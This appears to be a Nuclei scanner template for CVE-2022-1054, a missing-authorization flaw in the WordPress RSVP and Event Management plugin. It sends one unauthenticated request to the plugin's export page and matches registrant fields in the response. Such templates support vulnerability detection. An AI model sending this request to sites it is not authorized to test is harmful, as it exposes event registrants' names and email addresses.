44 lines
1.6 KiB
YAML
44 lines
1.6 KiB
YAML
id: CVE-2022-1054
|
|
|
|
info:
|
|
name: WordPress RSVP and Event Management <2.7.8 - Missing Authorization
|
|
author: Akincibor
|
|
severity: medium
|
|
description: WordPress RSVP and Event Management plugin before 2.7.8 is susceptible to missing authorization. The plugin does not have any authorization checks when exporting its entries, and the export function is hooked to the init action. An attacker can potentially retrieve sensitive information such as first name, last name, and email address of users registered for events,
|
|
remediation: |
|
|
Update the WordPress RSVP and Event Management plugin to version 2.7.8 or later.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/95a5fad1-e823-4571-8640-19bf5436578d
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
cvss-score: 5.3
|
|
cve-id: CVE-2022-1054
|
|
cwe-id: CWE-862
|
|
epss-score: 0.00292
|
|
epss-percentile: 0.6575
|
|
cpe: cpe:2.3:a:wpchill:rsvp_and_event_management:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: wpchill
|
|
product: rsvp_and_event_management
|
|
framework: wordpress
|
|
tags: wordpress,cve,cve2022,wpscan,wp,wp-plugin
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/wp-admin/admin.php?page=rsvp-admin-export'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'RSVP Status'
|
|
- '"First Name"'
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100d93e5a43e332f3a11992b059f3cbbc7e95ed5bd7cf5a6ffdbad30b1dce164f140220688c0af75777ad614007870c125a9b5102f34be513fbae6ef1391693df7aed67:922c64590222798bb761d5b6d8e72950 |